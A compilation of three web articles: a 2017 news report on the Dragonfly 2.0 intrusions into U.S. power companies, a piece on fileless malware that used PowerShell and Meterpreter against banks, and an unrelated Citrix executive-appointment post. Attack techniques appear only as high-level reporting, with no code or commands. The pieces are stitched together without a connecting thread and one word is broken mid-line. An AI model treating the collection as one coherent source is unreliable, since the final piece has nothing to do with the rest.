U.S. energy grid intrusion is a warning, says former NSA official

Power Grid (Photo: Getty Images)


SAN FRANCISCO — Over the last nine months, dozens of U.S. power companies were compromised by an organized hacking group to the extent that some of them could have sabotaged and shut down production and distribution, according to Symantec, a cybersecurity company that discovered the attack.

In some cases, this involved access to details about how the company operated, engineering plans and equipment, in some cases ev

en down to the level of controlling valves, pipes or conveyer belts, said Vikram Thakur, principal research manager at Symantec, which discovered the intrusions and first published information about them in a blog posting Wednesday.

The level of access could have led to “pretty strong impacts,” said Thakur. “It could have taken out the business for a period of a day or two or maybe a month,” he said.

The core focus seems to have been companies that focus on power generation, transmission and distribution, Symantec said.

These attacks come as no surprise to anyone who’s worked in intelligence, said Joel Brenner. He was head of U.S. counterintelligence under the Director of National Intelligence from 2006 to 2008 and then Inspector General of the National Security Agency from 2009 – 2010. He is now a senior research fellow at the Massachusetts Institute of Technology.

The aim is to make clear to the United States that its systems are vulnerable and thus make the president think twice before engaging in any kind of military action, with the looming threat of darkened cities a possibility, he said.

“I think preparation for a potential attack is what we’re seeing. And whoever’s doing this, presumably the Russians, want us to know. People in the intelligence business always say that when the Russians are found, it’s because they want to be found.”

There are already examples of power companies being attacked by hackers and the lights going out. In 2015 and 2016 hackers disrupted Ukraine’s power grid, causing blackouts that hit more than 200,000 people. The Ukrainian government has blamed Russian-supported hackers for the attacks.

Why things didn’t go that far in this case is unknown, though Symantec believes it might have been a “proof of concept” attack, simply to prove to whatever government or organization was sponsoring the attackers that they had the capability.

“This confirms, again, that advanced adversaries are targeting and gaining access to the world’s critical infrastructure” said Galina Antova, co-founder, Claroty, a company that provides security for industrial control networks.

 “This gives bad actors the ability to harm our systems and possibly people when they choose — as a political statement, during the next conflict, before our during a war,” she said.

The Department of Homeland Security said it was aware of the Symantec report and was reviewing it.

“At this time there is no indication of a threat to public safety. We continue to coordinate with government and private sector partners to look into this activity,” the agency said in a statement.

The North American Electric Reliability Corporation is aware of the threat and is sharing information with industry and government partners, said Bill Lawrence, director of NERC’s  Electricity Information Sharing and Analysis Center.

“At this time, there are no impacts on the operation or reliability of the bulk power system in North America. NERC continues to monitor potential cyber security risks to reliability and share information with security stakeholders on emerging and evolving threats,” he said.


The ongoing attack appears to be the work of a group that Symantec and others first reported was targeting the energy sector beginning in 2011. Symantec dubbed it Dragonfly. CrowdStrike, which reported on the group in 2014, called it Energetic Bear and suggested it might have links to Russia.

Once the report went public in 2014, the group went dark. Then it appeared again in 2015, focused on Turkish energy companies that it continued to infiltrate through 2016, Thakur said.

Beginning in January, the attackers turned their attention to the United States and Switzerland. The initial attacks came through simple email phishing campaigns that got them into company networks, Symantec researchers found.

That led to two years of research and the discovery that Dragonfly 2.0 had penetrated “dozens” of companies.

“It’s still an ongoing campaign,” Thakur said.

Symantec shared information about the attackers with the companies and others who might have been impacted, but did not release their names in its public blog. Thakur said he has personally called between 50 and 75 energy companies in the past few months to warn them.

Thakur believes that energy-related companies have also been probed by the Dragonfly group, including companies that do commodity trading, finance organizations and investment groups.

The hackers appear to have made a concerted effort to make it difficult to identify them by using only open source and readily-available malware that wouldn’t pinpoint their location.

Critical infrastructure is being targeted with complex, well-resourced cyber attacks, said Josh Douglas, chief strategy officer for cyber services at Raytheon, a major U.S. defense contractor and industrial corporation.

The attributes of the Dragonfly attack are similar to those perpetrated by nation-states with deep pockets and long-term goals.

“They have invested strongly in their capabilities — some of which we have yet to see  — and that we may not yet know the full extent of this attack,” said Douglas.


Source: https://www.usatoday.com/story/tech/news/2017/09/06/dozens-power-companies-breached-hackers-cybersecurity-researcher-says/638503001/

New “Fileless Malware” Targets Banks and Organizations Spotted in the Wild

By: Swati Khandelwal
Source: http://thehackernews.com/2017/02/fileless-malware-bank.html

Fileless Malware

More than a hundred banks and financial institutions across the world have been infected with a dangerous sophisticated, memory-based malware that’s almost undetectable, researchers warned.

Newly published report by the Russian security firm Kaspersky Lab indicates that hackers are targeting banks, telecommunication companies, and government organizations in 40 countries, including the US, South America, Europe and Africa, with Fileless malware that resides solely in the memory of the compromised computers.

Fileless malware was first discovered by the same security firm in 2014, has never been mainstream until now. Fileless malware is a piece of nasty software that does not copy any files or folder to the hard drive in order to get executed. Instead, payloads are directly injected into the memory of running processes, and the malware executes in the system’s RAM.

Since the malware runs in the memory, the memory acquisition becomes useless once the system gets rebooted, making it difficult for digital forensic experts to find the traces of the malware.

The attack was initially discovered by a bank’s security team after they found a copy of Meterpreter — an in-memory component of Metasploit — inside the physical memory of a Microsoft domain controller.

Fileless Malware

After conducting a forensic analysis, Kaspersky researchers found that the attackers leveraged Windows PowerShell to load the Meterpreter code directly into memory rather than writing it to the disk. The cyber crooks also used Microsoft’s NETSH networking tool to set up a proxy tunnel for communicating with the command and control (C&C) server and remotely controlling the infected host.

They also stashed the PowerShell commands into the Windows registry in an effort to reduce nearly all traces of the attacks left in logs or hard drive after a reboot of the device, making detection and forensic analysis difficult. The ultimate goal of the attackers was apparently aimed at compromising computers that control ATMs so that they could steal money. Kaspersky Lab researchers plan to reveal more details in April about the attack, which is occurring on an industrial scale worldwide. The attack has already hit more than 140 enterprise networks in business sectors, with most victims located in the US, France, Ecuador, Kenya, the UK, and Russia. And since the threat is so hard to spot, the actual number is likely much higher.

Craig Stilwell Named VP of Worldwide Partner Strategy & Sales

As we look forward to new opportunities in 2017 and delivering a Citrix Summit that empowers our partners to achieve great success, I am excited to share that Citrix has appointed Craig Stilwell as Vice President of Worldwide Partner Strategy & Sales.

Craig Stilwell- Citrix VP of Partner Strategy

Many in the partner community already know Craig, who has been with Citrix for more than 17 years and understands our sales and channel strategy very well. We are thrilled to have him move into this very important position to lead our partner strategy and work with you all. Craig assumes the position previously held by Kimberly Martin, who is no longer with Citrix.

As the new worldwide channel leader, Craig will draw from his extensive sales and channel leadership experience to invigorate our commitment to our partners and their long-term success and profitability. Specifically, in the near-term Craig will focus on three priorities:

  • Drawing on his experience to lead a partner team aimed at maintaining our leadership in the enterprise market and increasing our presence in the mid-market.
  • Transitioning to the cloud and the major role the channel has to play in the move from on premise to the cloud.
  • Reducing the complexity of our channel programs and making it easier for partners to do business with Citrix.

Craig has more than 23 years of technology experience and, having spent the majority of his career at Citrix, knows our business extremely well. Most recently he served as Area Vice President of our U.S. Commercial business responsible for all sales and products in the U.S. Commercial segment. Previously, Craig served in several roles of increasing responsibility at Citrix, most notably as Vice President of Americas Channel Sales & Field Operations where he was not only responsible for Americas partners, but also marketing, renewal and inside sales, sales operations and field readiness.

Before joining Citrix, he was on the management team of an IT consulting firm based in South Florida, and served as a senior manager in the consumer products industry practice at Accenture.

Craig’s experience heading up our U.S. Commercial business and the Americas channel sales and field ops organization will be invaluable. We look forward to sharing more about our vision for 2017 with our partners next month at Citrix Summit in Anaheim! In the meantime, Craig will be reaching out to partners to say hello and always welcomes partners to contact him via LinkedIn.

By: Carlos Sartorius (Citrix Profile)

Source: https://www.citrix.com/blogs/2016/12/06/craig-stilwell-named-vice-president-of-worldwide-partner-strategy-and-sales/